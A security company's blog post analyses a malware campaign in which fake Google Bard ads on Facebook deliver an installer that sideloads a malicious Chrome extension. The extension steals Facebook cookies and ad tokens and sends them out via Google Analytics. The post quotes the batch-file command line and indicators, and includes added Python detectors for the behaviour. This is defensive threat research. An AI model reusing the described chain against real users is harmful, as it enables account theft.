Nexusguard Blog

August 08, 2023

Uncovering a New Threat: Malware Campaigns Disguised as Google Bard Ads on Facebook

 

Recently, a group of researchers at Nexusguard uncovered a malware campaign that disguised itself as a PC-based version of ChatGPT, the AI chatbot created by OpenAI on top of its Generative Pre-trained Transformer (GPT) series of large language models (LLMs).

A similar campaign has since resurfaced on Facebook, this time impersonating Google's Bard AI. Bard is an AI chatbot developed by Google and based on Google's large language model LaMDA, in the same way that ChatGPT is based on GPT. These models are neural networks, software that loosely mimics the structure of the brain.

On June 18, 2023, our team of researchers discovered a Facebook ad showing an image of Google Bard. The advertisement was posted by a fake Google AI Facebook page which, at the time of writing, has 233,000 likes and 243,000 followers (Figure 1).

 

Figure 1 – Fake Google AI Facebook page (hxxps[:]//www[.]facebook[.]com/google.ai.experience)

According to Facebook's page transparency feature, the page was created on April 20, 2012 under its former name, Plasma University (Figure 2).

 

Figure 2 – Page transparency of the fake Bard AI Facebook page

The Facebook advertisement posted by the fake Bard AI page contained a link which, when clicked, redirected visitors to a fake Google Bard website. That website in turn offered a file download link together with an access code (Figure 3).

 

Figure 3 – Fake Google Bard AI website with download link and access code


Clicking the link downloaded a RAR archive named "Google Ai Setup.rar", which contained an MSI installer named "Google Ai Setup.msi" (Figure 4).

 

Figure 4 – Files downloaded from the link in Figure 3

Uploading the downloaded MSI file to VirusTotal revealed that 27 out of 60 security vendors flagged it as malicious (Figure 5).

 

Figure 5 – VirusTotal scan result


To further understand the malware, our team performed dynamic analysis, executing the sample in a virtualized environment and observing the processes it spawned (Figure 6).

 

Figure 6 – Processes spawned during the execution of the malware


The malware dropped various files into “%ProgramFiles(x86)%\Google\Google Ai” on the infected machine and then launched cmd.exe with the following parameters: cmd.exe /c ""C:\Program Files (x86)\Google\Google Ai\ggbard.bat""


Closer inspection showed that ggbard.bat consists of a sequence of commands that terminate any running chrome.exe and chromedriver.exe processes, then relaunch Chrome with the malicious extension loaded (Figure 7).

Figure 7 – Content of ggbard.bat
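The chain described above (an MSI dropping a batch file, the batch file killing Chrome and relaunching it with a sideloaded extension) can be hunted for in process-creation telemetry. The following Python is an added example written for this post, not Nexusguard's code: it runs over constructed Sysmon-style events and assumes the extension was loaded with Chrome's --load-extension switch, which the post does not reproduce.

```python
import re

# Constructed process-creation events in the spirit of Sysmon Event ID 1 (not the
# post's own logs). The --load-extension switch is an assumption: the post says
# ggbard.bat kills chrome.exe/chromedriver.exe and relaunches Chrome with the
# extension, but does not show the exact command line.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c ""C:\Program Files (x86)\Google\Google Ai\ggbard.bat""',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /F /IM chrome.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /F /IM chromedriver.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Program Files (x86)\Google\Google Ai\ext"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

LOAD_EXT = re.compile(r"--load-extension=", re.IGNORECASE)
KILL_CHROME = re.compile(r"taskkill\b.*\b(chrome|chromedriver)\.exe", re.IGNORECASE)
BAT_FILE = re.compile(r"\.bat\b", re.IGNORECASE)

def score_events(events):
    """Return (index, reason) findings over an ordered list of process events."""
    findings = []
    chrome_killed = False
    for i, ev in enumerate(events):
        cmd = ev.get("CommandLine", "")
        image = ev.get("Image", "").lower()
        parent = ev.get("ParentImage", "").lower()
        if KILL_CHROME.search(cmd):
            chrome_killed = True            # remember for later chrome launches
            findings.append((i, "chrome/chromedriver terminated by taskkill"))
        elif image.endswith(r"\chrome.exe") and LOAD_EXT.search(cmd):
            reason = "chrome launched with --load-extension (sideloaded extension)"
            if parent.endswith(r"\cmd.exe"):
                reason += " from cmd.exe"
            if chrome_killed:
                reason += " after chrome was killed"
            findings.append((i, reason))
        elif image.endswith(r"\cmd.exe") and BAT_FILE.search(cmd) and parent.endswith(r"\msiexec.exe"):
            findings.append((i, "MSI installer spawning cmd.exe to run a .bat file"))
    return findings
```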

 

Decoding the Malicious Extension

The goal of the malware was to install a malicious extension in Google Chrome that masqueraded as the legitimate Google Translate extension.

 

Figure 8 – Malicious extension visible on the Google Chrome extensions page

Figure 9 – Content of the malicious Chrome extension

Figure 10 – Content of manifest.json

Figure 11 – Content of content.js

Figure 12 – Content of background.js


We inferred that the background.js file contained the malicious payload because its code was obfuscated, indicating a deliberate attempt to conceal its true intent.

Obfuscated version: https://pastebin.com/K1yNH0Yh 
De-obfuscated version: https://pastebin.com/YecRwVZA 

 

Figure 13 – Decoded background.js


Through our team's detailed analysis, we determined that the script was designed to gather Facebook cookies (lines 5-20) and Facebook ad manager access tokens (lines 27-43), which were then transmitted via Google Analytics (lines 1-4).

 

Figure 14 – Lines that steal Facebook cookies

Figure 15 – Lines that steal the Facebook ad manager access token

Figure 16 – Lines that show data exfiltration using Google Analytics

Line 14 reveals the Google Analytics 'tid' parameter UA-244663376-1, the tracking ID that identifies the Google Analytics property to which the stolen data is sent. Exfiltrating through Google Analytics is a way to bypass traditional Content Security Policy (CSP) controls, because the analytics endpoint is commonly allowlisted in a site's CSP; the same technique was used in several "Magecart" attacks in 2020 to steal credit card information.
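Because the exfiltration rides on a normally allowlisted analytics endpoint, the network-side check is to inspect Measurement Protocol hits rather than block the domain. The Python below is an added example, not code from the post: it scans constructed proxy log lines for /collect requests that use an unknown tid (the UA-244663376-1 property reported above) or carry cookie-like or oversized payload fields; the allowlist of the organisation's own properties is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines, "<timestamp> <client_ip> <method> <url>" (not logs from the post).
# UA-244663376-1 is the property ID the post reports in the decoded background.js;
# the cookie names resemble Facebook session cookies but the values are constructed.
LOG_LINES = [
    "2023-06-18T10:01:02Z 10.0.0.5 GET https://www.google-analytics.com/collect?v=1&tid=UA-111111-1&cid=555&t=pageview&dp=%2Fhome",
    "2023-06-18T10:01:09Z 10.0.0.5 GET https://www.google-analytics.com/collect?v=1&tid=UA-244663376-1&cid=555&t=event&ec=fb&ea=cookies&el=c_user%3D1000123%3B%20xs%3D" + "A" * 120,
    "2023-06-18T10:02:00Z 10.0.0.7 GET https://example.com/index.html",
]

KNOWN_TIDS = {"UA-111111-1"}                  # the organisation's own GA properties (assumption)
PAYLOAD_FIELDS = ("ec", "ea", "el", "dp", "dt", "dl")
COOKIE_LIKE = re.compile(r"\b\w+=[^;=\s]+;")  # "name=value;" pairs, as in document.cookie
MAX_FIELD_LEN = 100                           # legitimate event labels are short

def is_ga_host(host):
    return host == "google-analytics.com" or host.endswith(".google-analytics.com")

def inspect_line(line):
    """Return the reasons this request looks like GA-based exfiltration, or [] if benign."""
    parts = line.split(" ", 3)
    if len(parts) < 4:
        return []
    url = urlsplit(parts[3])
    if not url.hostname or not is_ga_host(url.hostname) or not url.path.endswith("/collect"):
        return []
    q = parse_qs(url.query)
    reasons = []
    tid = q.get("tid", [""])[0]
    if tid not in KNOWN_TIDS:
        reasons.append(f"unknown GA property {tid or '<none>'}")
    for field in PAYLOAD_FIELDS:
        for value in q.get(field, []):
            if COOKIE_LIKE.search(value):
                reasons.append(f"cookie-like data in '{field}'")
            if len(value) > MAX_FIELD_LEN:
                reasons.append(f"oversized '{field}' ({len(value)} chars)")
    return reasons

def scan(lines):
    """Map the index of each suspicious line to its list of reasons."""
    return {i: r for i, r in ((i, inspect_line(l)) for i, l in enumerate(lines)) if r}
```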

 

Conclusion

In summary, our investigation underscores the manner in which cyber threat actors are utilizing social engineering tactics to exploit the trust that users place in widely-used social networking platforms. It is imperative that users comprehend that a service's apparent legitimacy does not always guarantee its authenticity. Given the increasing sophistication of cybercriminal tactics, it is vital for users to remain vigilant, keep abreast of the latest developments, and take proactive measures to safeguard their personal information and online identity.


Nexusguard not only produces threat intelligence by gathering and analysing data on the latest malware threats, but also provides web and network application security solutions that can detect and block malware traffic, including traffic aimed at Facebook ads, enabling organizations to stay ahead of emerging attack methods before they proliferate. To gain unbroken visibility into your cyber risk profile, visit Nexusguard for more information.

Nexusguard offers leading-edge web and network application security solutions which are specifically designed to counter the spread of malware through social media channels, thereby ensuring that your systems and networks remain impervious to such perils.